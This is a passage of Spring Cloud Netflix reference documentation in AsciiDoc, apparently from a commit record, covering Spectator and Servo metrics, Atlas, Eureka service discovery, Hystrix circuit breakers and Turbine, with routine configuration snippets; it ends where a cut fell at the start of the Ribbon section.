a Spring Cloud based service will autoconfigure a Servo `MonitorRegistry` and begin collecting metrics on every Spring MVC request. By default, a Servo timer with the name `rest` will be recorded for each MVC request which is tagged with:\n\n1. HTTP method\n2. HTTP status (e.g. 200, 400, 500)\n3. URI (or \"root\" if the URI is empty), sanitized for Atlas\n4. The exception class name, if the request handler threw an exception\n5. The caller, if a request header with a key matching `netflix.metrics.rest.callerHeader` is set on the request. There is no default key for `netflix.metrics.rest.callerHeader`. You must add it to your application properties if you wish to collect caller information.\n\nSet the `netflix.metrics.rest.metricName` property to change the name of the metric from `rest` to a name you provide.\n\nIf Spring AOP is enabled and `org.aspectj:aspectjweaver` is present on your runtime classpath, Spring Cloud will also collect metrics on every client call made with `RestTemplate`. A Servo timer with the name of `restclient` will be recorded for each MVC request which is tagged with:\n\n1. HTTP method\n2. HTTP status (e.g. 200, 400, 500), \"CLIENT_ERROR\" if the response returned null, or \"IO_ERROR\" if an `IOException` occurred during the execution of the `RestTemplate` method\n3. URI, sanitized for Atlas\n4. Client name\n\n[[netflix-metrics-spectator]]\n=== Metrics Collection: Spectator\n\nTo enable Spectator metrics, include a dependency on `spring-boot-starter-spectator`:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-spectator<\/artifactId>\n <\/dependency>\n----\n\nIn Spectator parlance, a meter is a named, typed, and tagged configuration and a metric represents the value of a given meter at a point in time. Spectator meters are created and controlled by a registry, which currently has several different implementations. Spectator provides 4 meter types: counter, timer, gauge, and distribution summary.\n\nSpring Cloud Spectator integration configures an injectable `com.netflix.spectator.api.Registry` instance for you. Specifically, it configures a `ServoRegistry` instance in order to unify the collection of REST metrics and the exporting of metrics to the Atlas backend under a single Servo API. Practically, this means that your code may use a mixture of Servo monitors and Spectator meters and both will be scooped up by Spring Boot Actuator `MetricReader` instances and both will be shipped to the Atlas backend.\n\n==== Spectator Counter\n\nA counter is used to measure the rate at which some event is occurring.\n\n[source,java]\n----\n\/\/ create a counter with a name and a set of tags\nCounter counter = registry.counter(\"counterName\", \"tagKey1\", \"tagValue1\", ...);\ncounter.increment(); \/\/ increment when an event occurs\ncounter.increment(10); \/\/ increment by a discrete amount\n----\n\nThe counter records a single time-normalized statistic.\n\n==== Spectator Timer\n\nA timer is used to measure how long some event is taking. Spring Cloud automatically records timers for Spring MVC requests and conditionally `RestTemplate` requests, which can later be used to create dashboards for request related metrics like latency:\n\n.Request Latency\nimage::RequestLatency.png []\n\n[source,java]\n----\n\/\/ create a timer with a name and a set of tags\nTimer timer = registry.timer(\"timerName\", \"tagKey1\", \"tagValue1\", ...);\n\n\/\/ execute an operation and time it at the same time\nT result = timer.record(() -> fooReturnsT());\n\n\/\/ alternatively, if you must manually record the time\nLong start = System.nanoTime();\nT result = fooReturnsT();\ntimer.record(System.nanoTime() - start, TimeUnit.NANOSECONDS);\n----\n\nThe timer simultaneously records 4 statistics: count, max, totalOfSquares, and totalTime. The count statistic will always match the single normalized value provided by a counter if you had called `increment()` once on the counter for each time you recorded a timing, so it is rarely necessary to count and time separately for a single operation.\n\nFor link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Timer-Usage#longtasktimer[long running operations], Spectator provides a special `LongTaskTimer`.\n\n==== Spectator Gauge\n\nGauges are used to determine some current value like the size of a queue or number of threads in a running state. Since gauges are sampled, they provide no information about how these values fluctuate between samples.\n\nThe normal use of a gauge involves registering the gauge once in initialization with an id, a reference to the object to be sampled, and a function to get or compute a numeric value based on the object. The reference to the object is passed in separately and the Spectator registry will keep a weak reference to the object. If the object is garbage collected, then Spectator will automatically drop the registration. See link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Gauge-Usage#using-lambda[the note] in Spectator's documentation about potential memory leaks if this API is misused.\n\n[source,java]\n----\n\/\/ the registry will automatically sample this gauge periodically\nregistry.gauge(\"gaugeName\", pool, Pool::numberOfRunningThreads);\n\n\/\/ manually sample a value in code at periodic intervals -- last resort!\nregistry.gauge(\"gaugeName\", Arrays.asList(\"tagKey1\", \"tagValue1\", ...), 1000);\n----\n\n==== Spectator Distribution Summaries\n\nA distribution summary is used to track the distribution of events. It is similar to a timer, but more general in that the size does not have to be a period of time. For example, a distribution summary could be used to measure the payload sizes of requests hitting a server.\n\n[source,java]\n----\n\/\/ the registry will automatically sample this gauge periodically\nDistributionSummary ds = registry.distributionSummary(\"dsName\", \"tagKey1\", \"tagValue1\", ...);\nds.record(request.sizeInBytes());\n----\n\n[[netflix-metrics-servo]]\n=== Metrics Collection: Servo\n\nWARNING: If your code is compiled on Java 8, please use Spectator instead of Servo as Spectator is destined to replace Servo entirely in the long term.\n\nIn Servo parlance, a monitor is a named, typed, and tagged configuration and a metric represents the value of a given monitor at a point in time. Servo monitors are logically equivalent to Spectator meters. Servo monitors are created and controlled by a `MonitorRegistry`. In spite of the above warning, Servo does have a link:https:\/\/github.com\/Netflix\/servo\/wiki\/Getting-Started[wider array] of monitor options than Spectator has meters.\n\nSpring Cloud integration configures an injectable `com.netflix.servo.MonitorRegistry` instance for you. Once you have created the appropriate `Monitor` type in Servo, the process of recording data is wholly similar to Spectator.\n\n==== Creating Servo Monitors\n\nIf you are using the Servo `MonitorRegistry` instance provided by Spring Cloud (specifically, an instance of `DefaultMonitorRegistry`), Servo provides convenience classes for retrieving link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Servo-Comparison#dynamiccounter[counters] and link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Servo-Comparison#dynamictimer[timers]. These convenience classes ensure that only one `Monitor` is registered for each unique combination of name and tags.\n\nTo manually create a Monitor type in Servo, especially for the more exotic monitor types for which convenience methods are not provided, instantiate the appropriate type by providing a `MonitorConfig` instance:\n\n[source,java]\n----\nMonitorConfig config = MonitorConfig.builder(\"timerName\").withTag(\"tagKey1\", \"tagValue1\").build();\n\n\/\/ somewhere we should cache this Monitor by MonitorConfig\nTimer timer = new BasicTimer(config);\nmonitorRegistry.register(timer);\n----\n\n[[netflix-metrics-atlas]]\n=== Metrics Backend: Atlas\n\nAtlas was developed by Netflix to manage dimensional time series data for near real-time operational insight. Atlas features in-memory data storage, allowing it to gather and report very large numbers of metrics, very quickly.\n\nAtlas captures operational intelligence. Whereas business intelligence is data gathered for analyzing trends over time, operational intelligence provides a picture of what is currently happening within a system.\n\nSpring Cloud provides a `spring-cloud-starter-atlas` that has all the dependencies you need. Then just annotate your Spring Boot application with `@EnableAtlas` and provide a location for your running Atlas server with the `netflix.atlas.uri` property.\n\n==== Global tags\n\nSpring Cloud enables you to add tags to every metric sent to the Atlas backend. Global tags can be used to separate metrics by application name, environment, region, etc.\n\nEach bean implementing `AtlasTagProvider` will contribute to the global tag list:\n\n[source,java]\n----\n@Bean\nAtlasTagProvider atlasCommonTags(\n @Value(\"${spring.application.name}\") String appName) {\n return () -> Collections.singletonMap(\"app\", appName);\n}\n----\n\n==== Using Atlas\n\nTo bootstrap a in-memory standalone Atlas instance:\n\n[source,bash]\n----\n$ curl -LO https:\/\/github.com\/Netflix\/atlas\/releases\/download\/v1.4.2\/atlas-1.4.2-standalone.jar\n$ java -jar atlas-1.4.2-standalone.jar\n----\n\nTIP: An Atlas standalone node running on an r3.2xlarge (61GB RAM) can handle roughly 2 million metrics per minute for a given 6 hour window.\n\nOnce running and you have collected a handful of metrics, verify that your setup is correct by listing tags on the Atlas server:\n\n[source,bash]\n----\n$ curl http:\/\/ATLAS\/api\/v1\/tags\n----\n\nTIP: After executing several requests against your service, you can gather some very basic information on the request latency of every request by pasting the following url in your browser: `http:\/\/ATLAS\/api\/v1\/graph?q=name,rest,:eq,:avg`\n\nThe Atlas wiki contains a link:https:\/\/github.com\/Netflix\/atlas\/wiki\/Single-Line[compilation of sample queries] for various scenarios.\n\nMake sure to check out the link:https:\/\/github.com\/Netflix\/atlas\/wiki\/Alerting-Philosophy[alerting philosophy] and docs on using link:https:\/\/github.com\/Netflix\/atlas\/wiki\/DES[double exponential smoothing] to generate dynamic alert thresholds.\n","old_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-netflix\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:all: {asterisk}{asterisk}\n= Spring Cloud Netflix\n\ninclude::intro.adoc[]\n\n== Service Discovery: Eureka Clients\n\nService Discovery is one of the key tenets of a microservice based architecture. Trying to hand configure each client or some form of convention can be very difficult to do and can be very brittle. Eureka is the Netflix Service Discovery Server and Client. The server can be configured and deployed to be highly available, with each server replicating state about the registered services to the others.\n\n=== Registering with Eureka\n\nWhen a client registers with Eureka, it provides meta-data about itself\nsuch as host and port, health indicator URL, home page etc. Eureka\nreceives heartbeat messages from each instance belonging to a service.\nIf the heartbeat fails over a configurable timetable, the instance is\nnormally removed from the registry.\n\nExample eureka client:\n\n[source,java,indent=0]\n----\n@Configuration\n@ComponentScan\n@EnableAutoConfiguration\n@EnableEurekaClient\n@RestController\npublic class Application {\n\n @RequestMapping(\"\/\")\n public String home() {\n return \"Hello world\";\n }\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n----\n\n(i.e. utterly normal Spring Boot app). In this example we use\n`@EnableEurekaClient` explicitly, but with only Eureka available you\ncould also use `@EnableDiscoveryClient`. Configuration is required to\nlocate the Eureka server. Example:\n\n\n.application.yml\n----\neureka:\n client:\n serviceUrl:\n defaultZone: http:\/\/localhost:8761\/eureka\/\n----\n\nwhere \"defaultZone\" is a magic string fallback value that provides the\nservice URL for any client that doesn't express a preference\n(i.e. it's a useful default).\n\nThe default application name (service ID), virtual host and non-secure\nport, taken from the `Environment`, are `${spring.application.name}`,\n`${spring.application.name}` and `${server.port}` respectively.\n\n`@EnableEurekaClient` makes the app into both a Eureka \"instance\"\n(i.e. it registers itself) and a \"client\" (i.e. it can query the\nregistry to locate other services). The instance behaviour is driven\nby `eureka.instance.*` configuration keys, but the defaults will be\nfine if you ensure that your application has a\n`spring.application.name` (this is the default for the Eureka service\nID, or VIP).\n\nSee {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaInstanceConfigBean.java[EurekaInstanceConfigBean] and {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaClientConfigBean.java[EurekaClientConfigBean] for more details of the configurable options.\n\n=== Authenticating with the Eureka Server\n\nHTTP basic authentication will be automatically added to your eureka\nclient if one of the `eureka.client.serviceUrl.defaultZone` URLs has\ncredentials embedded in it (curl style, like\n`http:\/\/user:password@localhost:8761\/eureka`). For more complex needs\nyou can create a `@Bean` of type `DiscoveryClientOptionalArgs` and\ninject `ClientFilter` instances into it, all of which will be applied\nto the calls from the client to the server.\n\nNOTE: Because of a limitation in Eureka it isn't possible to support\nper-server basic auth credentials, so only the first set that are\nfound will be used.\n\n=== Status Page and Health Indicator\n\nThe status page and health indicators for a Eureka instance default to\n\"\/info\" and \"\/health\" respectively, which are the default locations of\nuseful endpoints in a Spring Boot Actuator application. You need to\nchange these, even for an Actuator application if you use a\nnon-default context path or servlet path\n(e.g. `server.servletPath=\/foo`) or management endpoint path\n(e.g. `management.contextPath=\/admin`). Example:\n\n.application.yml\n----\neureka:\n instance:\n statusPageUrlPath: ${management.context-path}\/info\n healthCheckUrlPath: ${management.context-path}\/health\n----\n\nThese links show up in the metadata that is consumed by clients, and\nused in some scenarios to decide whether to send requests to your\napplication, so it's helpful if they are accurate.\n\n=== Registering a Secure Application\n\nIf your app wants to be contacted over HTTPS you can set two flags in\nthe `EurekaInstanceConfig`, _viz_\n`eureka.instance.[nonSecurePortEnabled,securePortEnabled]=[false,true]`\nrespectively. This will make Eureka publish instance information\nshowing an explicit preference for secure communication. The Spring\nCloud `DiscoveryClient` will always return an `https:\/\/...` URI for a\nservice configured this way, and the Eureka (native) instance\ninformation will have a secure health check URL. \n\nBecause of the way\nEureka works internally, it will still publish a non-secure URL for\nstatus and home page unless you also override those explicitly.\nYou can use placeholders to configure the eureka instance urls,\ne.g.\n\n.application.yml\n----\neureka:\n instance:\n statusPageUrl: https:\/\/${eureka.hostname}\/info\n healthCheckUrl: https:\/\/${eureka.hostname}\/health\n homePageUrl: https:\/\/${eureka.hostname}\/\n----\n\n(Note that `${eureka.hostname}` is a native placeholder only available\nin later versions of Eureka. You could achieve the same thing with\nSpring placeholders as well, e.g. using `${eureka.instance.hostName}`.)\n\nNOTE: If your app is running behind a proxy, and the SSL termination\nis in the proxy (e.g. if you run in Cloud Foundry or other platforms\nas a service) then you will need to ensure that the proxy \"forwarded\"\nheaders are intercepted and handled by the application. An embedded\nTomcat container in a Spring Boot app does this automatically if it\nhas explicit configuration for the 'X-Forwarded-\\*` headers. A sign\nthat you got this wrong will be that the links rendered by your app to\nitself will be wrong (the wrong host, port or protocol).\n\n=== Eureka's Health Checks\n\nBy default, Eureka uses the client heartbeat to determine if a client is up.\nUnless specified otherwise the Discovery Client will not propagate the\ncurrent health check status of the application per the Spring Boot Actuator. Which means\nthat after successful registration Eureka will always announce that the\napplication is in 'UP' state. This behaviour can be altered by enabling\nEureka health checks, which results in propagating application status\nto Eureka. As a consequence every other application won't be sending\ntraffic to application in state other then 'UP'.\n\n.application.yml\n----\neureka:\n client:\n healthcheck:\n enabled: true\n----\n\nIf you require more control over the health checks, you may consider\nimplementing your own `com.netflix.appinfo.HealthCheckHandler`.\n\n=== Eureka Metadata for Instances and Clients\n\nIt's worth spending a bit of time understanding how the Eureka metadata works, so you can use it in a way that makes sense in your platform. There is standard metadata for things like hostname, IP address, port numbers, status page and health check. These are published in the service registry and used by clients to contact the services in a straightforward way. Additional metadata can be added to the instance registration in the `eureka.instance.metadataMap`, and this will be accessible in the remote clients, but in general will not change the behaviour of the client, unless it is made aware of the meaning of the metadata. There are a couple of special cases described below where Spring Cloud already assigns meaning to the metadata map.\n\n==== Using Eureka on Cloudfoundry\n\nCloudfoundry has a global router so that all instances of the same app have the same hostname (it's the same in other PaaS solutions with a similar architecture). This isn't necessarily a barrier to using Eureka, but if you use the router (recommended, or even mandatory depending on the way your platform was set up), you need to explicitly set the hostname and port numbers (secure or non-secure) so that they use the router. You might also want to use instance metadata so you can distinguish between the instances on the client (e.g. in a custom load balancer). By default, the `eureka.instance.instanceId` is `vcap.application.instance_id`. For example:\n\n.application.yml\n----\neureka:\n instance:\n hostname: ${vcap.application.uris[0]}\n nonSecurePort: 80\n----\n\nDepending on the way the security rules are set up in your Cloudfoundry instance, you might be able to register and use the IP address of the host VM for direct service-to-service calls. This feature is not (yet) available on Pivotal Web Services (https:\/\/run.pivotal.io[PWS]).\n\n==== Using Eureka on AWS\n\nIf the application is planned to be deployed to an AWS cloud, then the Eureka instance will have to be configured to be Amazon aware and this can be done by customizing the {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaInstanceConfigBean.java[EurekaInstanceConfigBean] the following way:\n\n[source,java,indent=0]\n----\n@Bean\n@Profile(\"!default\")\npublic EurekaInstanceConfigBean eurekaInstanceConfig() {\n EurekaInstanceConfigBean b = new EurekaInstanceConfigBean();\n AmazonInfo info = AmazonInfo.Builder.newBuilder().autoBuild(\"eureka\");\n b.setDataCenterInfo(info);\n return b;\n}\n----\n\n==== Changing the Eureka Instance ID\n\nA vanilla Netflix Eureka instance is registered with an ID that is equal to its host name (i.e. only one service per host). Spring Cloud Eureka provides a sensible default that looks like this: `${spring.cloud.client.hostname}:${spring.application.name}:${spring.application.instance_id:${server.port}}}`. For example `myhost:myappname:8080`.\n\nUsing Spring Cloud you can override this by providing a unique identifier in `eureka.instance.instanceId`. For example:\n\n.application.yml\n----\neureka:\n instance:\n instanceId: ${spring.application.name}:${spring.application.instance_id:${random.value}}\n----\n\nWith this metadata, and multiple service instances deployed on\nlocalhost, the random value will kick in there to make the instance\nunique. In Cloudfoundry the `spring.application.instance_id` will be\npopulated automatically in a Spring Boot Actuator application, so the\nrandom value will not be needed.\n\n=== Using the EurekaClient\n\nOnce you have an app that is `@EnableDiscoveryClient` (or `@EnableEurekaClient`) you can use it to\ndiscover service instances from the <<spring-cloud-eureka-server,\nEureka Server>>. One way to do that is to use the native\n`com.netflix.discovery.EurekaClient` (as opposed to the Spring\nCloud `DiscoveryClient`), e.g.\n\n----\n@Autowired\nprivate EurekaClient discoveryClient;\n\npublic String serviceUrl() {\n InstanceInfo instance = discoveryClient.getNextServerFromEureka(\"STORES\", false);\n return instance.getHomePageUrl();\n}\n----\n\n[TIP]\n====\nDon't use the `EurekaClient` in `@PostConstruct` method or in a\n`@Scheduled` method (or anywhere where the `ApplicationContext` might\nnot be started yet). It is initialized in a `SmartLifecycle` (with\n`phase=0`) so the earliest you can rely on it being available is in\nanother `SmartLifecycle` with higher phase.\n====\n\n=== Alternatives to the native Netflix EurekaClient\n\nYou don't have to use the raw Netflix `EurekaClient` and usually it\nis more convenient to use it behind a wrapper of some sort. Spring\nCloud has support for <<spring-cloud-feign, Feign>> (a REST client\nbuilder) and also <<spring-cloud-ribbon, Spring `RestTemplate`>> using\nthe logical Eureka service identifiers (VIPs) instead of physical\nURLs. To configure Ribbon with a fixed list of physical servers you\ncan simply set `<client>.ribbon.listOfServers` to a comma-separated\nlist of physical addresses (or hostnames), where `<client>` is the ID\nof the client.\n\nYou can also use the `org.springframework.cloud.client.discovery.DiscoveryClient`\nwhich provides a simple API for discovery clients that is not specific\nto Netflix, e.g.\n\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n\npublic String serviceUrl() {\n List<ServiceInstance> list = discoveryClient.getInstances(\"STORES\");\n if (list != null && list.size() > 0 ) {\n return list.get(0).getUri();\n }\n return null;\n}\n----\n\n=== Why is it so Slow to Register a Service?\n\nBeing an instance also involves a periodic heartbeat to the registry\n(via the client's `serviceUrl`) with default duration 30 seconds. A\nservice is not available for discovery by clients until the instance,\nthe server and the client all have the same metadata in their local\ncache (so it could take 3 heartbeats). You can change the period using\n`eureka.instance.leaseRenewalIntervalInSeconds` and this will speed up\nthe process of getting clients connected to other services. In\nproduction it's probably better to stick with the default because\nthere are some computations internally in the server that make\nassumptions about the lease renewal period.\n\n[[spring-cloud-eureka-server]]\n== Service Discovery: Eureka Server\n\nExample eureka server (e.g. using spring-cloud-starter-eureka-server to set up the classpath):\n\n[source,java,indent=0]\n----\n@SpringBootApplication\n@EnableEurekaServer\npublic class Application {\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n----\n\nThe server has a home page with a UI, and HTTP API endpoints per the\nnormal Eureka functionality under `\/eureka\/*`.\n\nEureka background reading: see https:\/\/github.com\/cfregly\/fluxcapacitor\/wiki\/NetflixOSS-FAQ#eureka-service-discovery-load-balancer[flux capacitor] and https:\/\/groups.google.com\/forum\/?fromgroups#!topic\/eureka_netflix\/g3p2r7gHnN0[google group discussion].\n\n\n[TIP]\n====\nDue to Gradle's dependency resolution rules and the lack of a parent bom feature, simply depending on spring-cloud-starter-eureka-server can cause failures on application startup. To remedy this the Spring Boot Gradle plugin must be added and the Spring cloud starter parent bom must be imported like so:\n\n.build.gradle\n[source,java,indent=0]\n----\nbuildscript {\n dependencies {\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:1.3.5.RELEASE\")\n }\n}\n\napply plugin: \"spring-boot\"\n\ndependencyManagement {\n imports {\n mavenBom \"org.springframework.cloud:spring-cloud-dependencies:Brixton.RELEASE\"\n }\n}\n----\n====\n\n=== High Availability, Zones and Regions\n\nThe Eureka server does not have a backend store, but the service\ninstances in the registry all have to send heartbeats to keep their\nregistrations up to date (so this can be done in memory). Clients also\nhave an in-memory cache of eureka registrations (so they don't have to\ngo to the registry for every single request to a service).\n\nBy default every Eureka server is also a Eureka client and requires\n(at least one) service URL to locate a peer. If you don't provide it\nthe service will run and work, but it will shower your logs with a lot\nof noise about not being able to register with the peer.\n\nSee also <<spring-cloud-ribbon,below for details of Ribbon\nsupport>> on the client side for Zones and Regions.\n\n=== Standalone Mode\n\nThe combination of the two caches (client and server) and the\nheartbeats make a standalone Eureka server fairly resilient to\nfailure, as long as there is some sort of monitor or elastic runtime\nkeeping it alive (e.g. Cloud Foundry). In standalone mode, you might\nprefer to switch off the client side behaviour, so it doesn't keep\ntrying and failing to reach its peers. Example:\n\n.application.yml (Standalone Eureka Server)\n----\nserver:\n port: 8761\n\neureka:\n instance:\n hostname: localhost\n client:\n registerWithEureka: false\n fetchRegistry: false\n serviceUrl:\n defaultZone: http:\/\/${eureka.instance.hostname}:${server.port}\/eureka\/\n----\n\nNotice that the `serviceUrl` is pointing to the same host as the local\ninstance.\n\n=== Peer Awareness\n\nEureka can be made even more resilient and available by running\nmultiple instances and asking them to register with each other. In\nfact, this is the default behaviour, so all you need to do to make it\nwork is add a valid `serviceUrl` to a peer, e.g.\n\n.application.yml (Two Peer Aware Eureka Servers)\n----\n\n---\nspring:\n profiles: peer1\neureka:\n instance:\n hostname: peer1\n client:\n serviceUrl:\n defaultZone: http:\/\/peer2\/eureka\/\n\n---\nspring:\n profiles: peer2\neureka:\n instance:\n hostname: peer2\n client:\n serviceUrl:\n defaultZone: http:\/\/peer1\/eureka\/\n----\n\nIn this example we have a YAML file that can be used to run the same\nserver on 2 hosts (peer1 and peer2), by running it in different\nSpring profiles. You could use this configuration to test the peer\nawareness on a single host (there's not much value in doing that in\nproduction) by manipulating `\/etc\/hosts` to resolve the host names. In\nfact, the `eureka.instance.hostname` is not needed if you are running\non a machine that knows its own hostname (it is looked up using\n`java.net.InetAddress` by default).\n\nYou can add multiple peers to a system, and as long as they are all\nconnected to each other by at least one edge, they will synchronize\nthe registrations amongst themselves. If the peers are physically\nseparated (inside a data centre or between multiple data centres) then\nthe system can in principle survive split-brain type failures.\n\n=== Prefer IP Address\n\nIn some cases, it is preferable for Eureka to advertise the IP Adresses\nof services rather than the hostname. Set `eureka.instance.preferIpAddress`\nto `true` and when the application registers with eureka, it will use its\nIP Address rather than its hostname.\n\n== Circuit Breaker: Hystrix Clients\n\nNetflix has created a library called https:\/\/github.com\/Netflix\/Hystrix[Hystrix] that implements the http:\/\/martinfowler.com\/bliki\/CircuitBreaker.html[circuit breaker pattern]. In a microservice architecture it is common to have multiple layers of service calls.\n\n.Microservice Graph\nimage::HystrixGraph.png[]\n\nA service failure in the lower level of services can cause cascading failure all the way up to the user. When calls to a particular service reach a certain threshold (20 failures in 5 seconds is the default in Hystrix), the circuit opens and the call is not made. In cases of error and an open circuit a fallback can be provided by the developer.\n\n.Hystrix fallback prevents cascading failures\nimage::HystrixFallback.png[]\n\nHaving an open circuit stops cascading failures and allows overwhelmed or failing services time to heal. The fallback can be another Hystrix protected call, static data or a sane empty value. Fallbacks may be chained so the first fallback makes some other business call which in turn falls back to static data.\n\nExample boot app:\n\n----\n@SpringBootApplication\n@EnableCircuitBreaker\npublic class Application {\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n\n@Component\npublic class StoreIntegration {\n\n @HystrixCommand(fallbackMethod = \"defaultStores\")\n public Object getStores(Map<String, Object> parameters) {\n \/\/do stuff that might fail\n }\n\n public Object defaultStores(Map<String, Object> parameters) {\n return \/* something useful *\/;\n }\n}\n\n----\n\nThe `@HystrixCommand` is provided by a Netflix contrib library called\nhttps:\/\/github.com\/Netflix\/Hystrix\/tree\/master\/hystrix-contrib\/hystrix-javanica[\"javanica\"].\nSpring Cloud automatically wraps Spring beans with that\nannotation in a proxy that is connected to the Hystrix circuit\nbreaker. The circuit breaker calculates when to open and close the\ncircuit, and what to do in case of a failure.\n\nTo configure the `@HystrixCommand` you can use the `commandProperties`\nattribute with a list of `@HystrixProperty` annotations. See\nhttps:\/\/github.com\/Netflix\/Hystrix\/tree\/master\/hystrix-contrib\/hystrix-javanica#configuration[here]\nfor more details. See the https:\/\/github.com\/Netflix\/Hystrix\/wiki\/Configuration[Hystrix wiki]\nfor details on the properties available.\n\n=== Propagating the Security Context or using Spring Scopes\n\nIf you want some thread local context to propagate into a `@HystrixCommand` the default declaration will not work because it executes the command in a thread pool (in case of timeouts). You can switch Hystrix to use the same thread as the caller using some configuration, or directly in the annotation, by asking it to use a different \"Isolation Strategy\". For example:\n\n[source,java]\n----\n@HystrixCommand(fallbackMethod = \"stubMyService\",\n commandProperties = {\n @HystrixProperty(name=\"execution.isolation.strategy\", value=\"SEMAPHORE\")\n }\n)\n...\n----\n\nThe same thing applies if you are using `@SessionScope` or `@RequestScope`. You will know when you need to do this because of a runtime exception that says it can't find the scoped context.\n\n### Health Indicator\n\nThe state of the connected circuit breakers are also exposed in the\n`\/health` endpoint of the calling application.\n\n[source,json,indent=0]\n----\n{\n \"hystrix\": {\n \"openCircuitBreakers\": [\n \"StoreIntegration::getStoresByLocationLink\"\n ],\n \"status\": \"CIRCUIT_OPEN\"\n },\n \"status\": \"UP\"\n}\n----\n\n=== Hystrix Metrics Stream\n\nTo enable the Hystrix metrics stream include a dependency on `spring-boot-starter-actuator`. This will expose the `\/hystrix.stream` as a management endpoint.\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n <\/dependency>\n----\n\n== Circuit Breaker: Hystrix Dashboard\n\nOne of the main benefits of Hystrix is the set of metrics it gathers about each HystrixCommand. The Hystrix Dashboard displays the health of each circuit breaker in an efficient manner.\n\n.Hystrix Dashboard\nimage::Hystrix.png[]\n\nTo run the Hystrix Dashboard annotate your Spring Boot main class with `@EnableHystrixDashboard`. You then visit `\/hystrix` and point the dashboard to an individual instances `\/hystrix.stream` endpoint in a Hystrix client application.\n\n=== Turbine\n\nLooking at an individual instances Hystrix data is not very useful in terms of the overall health of the system. https:\/\/github.com\/Netflix\/Turbine[Turbine] is an application that aggregates all of the relevant `\/hystrix.stream` endpoints into a combined `\/turbine.stream` for use in the Hystrix Dashboard. Individual instances are located via Eureka. Running Turbine is as simple as annotating your main class with the `@EnableTurbine` annotation (e.g. using spring-cloud-starter-turbine to set up the classpath). All of the documented configuration properties from https:\/\/github.com\/Netflix\/Turbine\/wiki\/Configuration-(1.x)[the Turbine 1 wiki] apply. The only difference is that the `turbine.instanceUrlSuffix` does not need the port prepended as this is handled automatically unless `turbine.instanceInsertPort=false`.\n\nThe configuration key `turbine.appConfig` is a list of eureka serviceIds that turbine will use to lookup instances. The turbine stream is then used in the Hystrix dashboard using a url that looks like: `http:\/\/my.turbine.sever:8080\/turbine.stream?cluster=<CLUSTERNAME>` (the cluster parameter can be omitted if the name is \"default\"). The `cluster` parameter must match an entry in `turbine.aggregator.clusterConfig`. Values returned from eureka are uppercase, thus we expect this example to work if there is an app registered with Eureka called \"customers\":\n\n----\nturbine:\n aggregator:\n clusterConfig: CUSTOMERS\n appConfig: customers\n----\n\nThe `clusterName` can be customized by a SPEL expression in `turbine.clusterNameExpression` with root an instance of `InstanceInfo`. The default value is `appName`, which means that the Eureka serviceId ends up as the cluster key (i.e. the `InstanceInfo` for customers has an `appName` of \"CUSTOMERS\"). A different example would be `turbine.clusterNameExpression=aSGName`, which would get the cluster name from the AWS ASG name. Another example:\n\n----\nturbine:\n aggregator:\n clusterConfig: SYSTEM,USER\n appConfig: customers,stores,ui,admin\n clusterNameExpression: metadata['cluster']\n----\n\nIn this case, the cluster name from 4 services is pulled from their metadata map, and is expected to have values that include \"SYSTEM\" and \"USER\".\n\nTo use the \"default\" cluster for all apps you need a string literal expression (with single quotes, and escaped with double quotes if it is in YAML as well):\n\n----\nturbine:\n appConfig: customers,stores\n clusterNameExpression: \"'default'\"\n----\n\nSpring Cloud provides a `spring-cloud-starter-turbine` that has all the dependencies you need to get a Turbine server running. Just create a Spring Boot application and annotate it with `@EnableTurbine`.\n\nNOTE: by default Spring Cloud allows Turbine to use the host and port to allow multiple processes per host, per cluster. If you want the native Netflix behaviour built into Turbine that does _not_ allow multiple processes per host, per cluster (the key to the instance id is the hostname), then set the property `turbine.combineHostPort=false`.\n\n=== Turbine Stream\n\nIn some environments (e.g. in a PaaS setting), the classic Turbine model of pulling metrics from all the distributed Hystrix commands doesn't work. In that case you might want to have your Hystrix commands push metrics to Turbine, and Spring Cloud enables that with messaging. All you need to do on the client is add a dependency to `spring-cloud-netflix-hystrix-stream` and the `spring-cloud-starter-stream-*` of your choice (see Spring Cloud Stream documentation for details on the brokers, and how to configure the client credentials, but it should work out of the box for a local broker).\n\nOn the server side Just create a Spring Boot application and annotate it with `@EnableTurbineStream` and by default it will come up on port 8989 (point your Hystrix dashboard to that port, any path). You can customize the port using either `server.port` or `turbine.stream.port`. If you have `spring-boot-starter-web` and `spring-boot-starter-actuator` on the classpath as well, then you can open up the Actuator endpoints on a separate port (with Tomcat by default) by providing a `management.port` which is different.\n\nYou can then point the Hystrix Dashboard to the Turbine Stream Server instead of individual Hystrix streams. If Turbine Stream is running on port 8989 on myhost, then put `http:\/\/myhost:8989` in the stream input field in the Hystrix Dashboard. Circuits will be prefixed by their respective serviceId, followed by a dot, then the circuit name.\n\nSpring Cloud provides a `spring-cloud-starter-turbine-stream` that has all the dependencies you need to get a Turbine Stream server running - just add the Stream binder of your choice, e.g. `spring-cloud-starter-stream-rabbit`. You need Java 8 to run the app because it is Netty-based.\n\n[[spring-cloud-ribbon]]\n== Client Side Load Balancer: Ribbon\n\nRibbon is a client side load balancer which gives you a lot of control\nover the behaviour of HTTP and TCP clients. Feign already uses Ribbon,\nso if you are using `@FeignClient` then this section also applies.\n\nA central concept in Ribbon is that of the named client. Each load\nbalancer is part of an ensemble of components that work together to\ncontact a remote server on demand, and the ensemble 